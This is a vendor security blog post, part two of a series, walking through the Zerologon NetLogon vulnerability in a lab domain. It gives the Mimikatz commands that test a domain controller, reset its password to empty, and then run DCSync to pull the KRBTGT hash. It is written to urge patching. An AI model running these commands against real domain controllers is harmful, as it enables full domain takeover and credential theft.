Stealthbits

Zerologon: From Zero to Hero – Part 2

Blog >Zerologon: From Zero to Hero – Part 2
| Kevin Joyce | | 1 Comment

How Does it Work?

In Part 1 of this blog series (What is Zerologon?), we discussed how Zerologon exploits a vulnerability in NetLogon that allows a malicious actor on your network to take over a Domain Controller (DC), and eventually your entire domain. Now let’s dive into the specifics of how Zerologon works.

Using Mimikatz to Execute the Zerologon Exploit

For starters, you can easily identify if a target domain controller is vulnerable to the Zerologon exploit with Mimikatz by running:

lsadump::Zerologon /target:sbpmlab-dc3 /account:sbpmlab-dc3$ /null /ntlm
Testing if a domain controller is vulnerable to Zerologon
Testing if a domain controller is vulnerable to Zerologon

In the instance that it comes back as vulnerable, we can then run the same command, but add…

/exploit

…to actually exploit the vulnerability and change the Domain Controller’s password to an empty string.

Exploiting a vulnerable domain controller
Exploiting a vulnerable domain controller

As you can tell from the results after running the command, Mimikatz is claiming it set the password of the Domain Controller, which may mean that it is unstable, but also something that we can exploit. From here, an attacker can use Mimikatz to also run a DCSync attack and get the hash of a domain admin account or the KRBTGT account.

lsadump::dcsync /domain:sbpmlab.net /dc:sbpmlab-dc3 /user:krbtgt /authuser:sbpmlab-dc3$ /authdomain:sbpmlab /authpassword:”” /authntlm
Executing a DCSync post-Zerologon exploit
Executing a DCSync post-Zerologon exploit

It’s really that simple. With just a couple steps, you can see how easy it is to exploit this vulnerability (provided a malicious actor can get onto your network and find a Domain Controller that is unpatched).

The biggest takeaway from this quick proof of concept should be that you must urgently patch your Domain Controllers with the August 11th security update, if you haven’t already.

Zerologon Detection and Mitigation Solution

Alright, so we went over the new patch and update plans from Microsoft in Part 1, as well as the attack itself here in Part 2. In my next blog, I spend a little time outlining how Stealthbits can help. Check it out!

Leave a Reply

Your email address will not be published. Required fields are marked *

Subscribe

DON’T MISS A POST. SUBSCRIBE TO THE BLOG!

 

Loading

© 2020 Stealthbits Technologies, Inc.

Start a Free Stealthbits Trial!

No risk. No obligation.

FREE TRIAL